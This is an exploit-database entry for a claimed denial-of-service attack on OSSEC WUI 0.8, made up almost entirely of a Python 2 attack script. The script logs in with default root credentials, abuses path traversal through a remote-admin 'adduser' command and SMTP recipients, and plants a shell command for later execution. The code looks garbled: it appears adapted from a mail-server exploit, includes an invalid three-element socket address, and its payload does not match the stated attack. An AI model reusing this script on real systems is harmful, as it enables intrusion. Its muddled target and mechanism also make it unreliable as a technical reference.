OSSEC WUI 0.8 - Denial of Service

EDB-ID:

37728

CVE:

N/A


Type:

dos


Platform:

PHP

Date:

2015-08-07


###########################################################
# Exploit Title: [OSSEC]
# Date: [2015-08-01]
# Exploit Author: [Milad Saber]
# Vendor Homepage: [www.ossec.net]
# Software Link: [www.ossec.net/files/ossec-wui-0.8.tar.gz]
# Version: [0.8]
# Tested on: [OSSEC Manager]
# Exploit for DOS ossec server.
# Please install ossec server and WUI 0.8 and run this exploit
##########################################################
import socket
import sys
import time
 
# specify payload
payload = '[ "$(id -u)" == "0" ] && touch /var/ossec/ossec.conf' # to exploit only on root
user = 'root'
pwd = 'var'
 
if len(sys.argv) != 2:
    sys.stderr.write("[-]Usage: python %s <ip>\ossec-wui-0.8" % sys.argv[0])
    sys.stderr.write("[-]Exemple: python %s 127.0.0.1\ossec-wui-0.8" % sys.argv[0])
    sys.exit(1)
 
ip = sys.argv[1]
 
def recv(s):
        s.recv(1024)
        time.sleep(0.2)
 
try:
    print "[+]Connecting to milad exploit ..."
    s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
    s.connect((ip,4555))
    s.recv(1024)
    s.send(user + "\n")
    s.recv(1024)
    s.send(pwd + "\n")
    s.recv(1024)
    print "[+]Creating user..."
    s.send("adduser ../../../../../../../../var/ossec/ossec.conf exploit\n")
    s.recv(1024)
    s.send("quit\n")
    s.close()
 
    print "[+]Connecting to SMTP server..."
    s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
    s.connect((ip,25,80))
    s.send("hello milad@milad.pl\r\n")
    recv(s)
    print "[+]Sending payload..."
    s.send("mail from: <'@milad.pl>\r\n")
    recv(s)
    # also try s.send("rcpt to: <../../../../../../../../var/ossec/ossec.conf/r\n") if the recipient cannot be found
    s.send("rcpt to: <../../../../../../../../var/ossec/ossec.conf\r\n")
    recv(s)
    s.send("data\r\n")
    recv(s)
    s.send("From: milad@milad.pl\r\n")
    s.send("\r\n")
    s.send("'\n")
    s.send(payload + "\n")
    s.send("\r\n.\r\n")
    recv(s)
    s.send("quit\r\n")
    recv(s)
    s.close()
    print "[+]Done! Payload will be executed once somebody logs in."
except:
    print "Connection failed."